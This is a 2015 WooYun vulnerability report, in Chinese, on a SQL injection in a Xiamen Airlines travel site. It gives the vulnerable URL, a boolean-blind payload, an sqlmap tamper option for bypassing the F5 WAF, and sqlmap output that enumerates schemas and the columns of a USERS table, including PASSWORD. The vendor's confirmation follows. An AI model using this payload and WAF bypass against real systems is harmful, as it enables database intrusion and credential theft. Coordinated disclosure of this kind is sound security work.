乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-06: 细节已通知厂商并且等待厂商处理中 2015-06-09: 厂商已经确认,细节仅向厂商公开 2015-06-19: 细节向核心白帽子及相关领域专家公开 2015-06-29: 细节向普通白帽子公开 2015-07-09: 细节向实习白帽子公开 2015-07-24: 细节向公众公开
RT
sql注入一枚
http://travel.xiamenair.com/Travel/Domestic.html?start=%7Cundefined&end=%25u53A6%25u95E8%7CXMN
end参数存在sql注入sqlmap跑下由于有F5的waf,所以需要加--tamper=greatest.py (作用:绕过过滤’>’ ,用GREATEST替换大于号)
sqlmap identified the following injection points with a total of 261 HTTP(s) requests:---Parameter: end (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: start=|undefined&end=%u53A6%u95E8|XMN' AND 5242=5242 AND 'dwgq'='dwgq Vector: AND [INFERENCE]---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Oraclecurrent user: 'XMAIR'current schema (equivalent to database on Oracle): 'XMAIR'current user is DBA: Falseavailable databases [4]:[*] SYS[*] SYSTEM[*] XHSHOPADM[*] XMAIRsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: end (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: start=|undefined&end=%u53A6%u95E8|XMN' AND 5242=5242 AND 'dwgq'='dwgq Vector: AND [INFERENCE]---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: OracleNo tables foundsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: end (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: start=|undefined&end=%u53A6%u95E8|XMN' AND 5242=5242 AND 'dwgq'='dwgq Vector: AND [INFERENCE]---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Oraclesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: end (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: start=|undefined&end=%u53A6%u95E8|XMN' AND 5242=5242 AND 'dwgq'='dwgq Vector: AND [INFERENCE]---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: OracleDatabase: XMAIR[1 table]+-------+| USERS |+-------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: end (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: start=|undefined&end=%u53A6%u95E8|XMN' AND 5242=5242 AND 'dwgq'='dwgq Vector: AND [INFERENCE]---web server operating system: Windowsweb application technology: ASP.NET, ASP.NET 4.0.30319back-end DBMS: OracleDatabase: XMAIRTable: USERS[9 columns]+-------------+-------------+| Column | Type |+-------------+-------------+| DESCRIPTION | non-numeric || EMAIL | non-numeric || PASSWORD | numeric || PRODUCT_ID | numeric || ROWID | non-numeric || TITLE | non-numeric || UID | numeric || USERID | numeric || USERNAME | numeric |+-------------+-------------+
就不继续跑了,实在是有些慢。。。
参数过滤
危害等级:中
漏洞Rank:8
确认时间:2015-06-09 08:48
已确认,谢谢对厦航信息安全工作的支持
暂无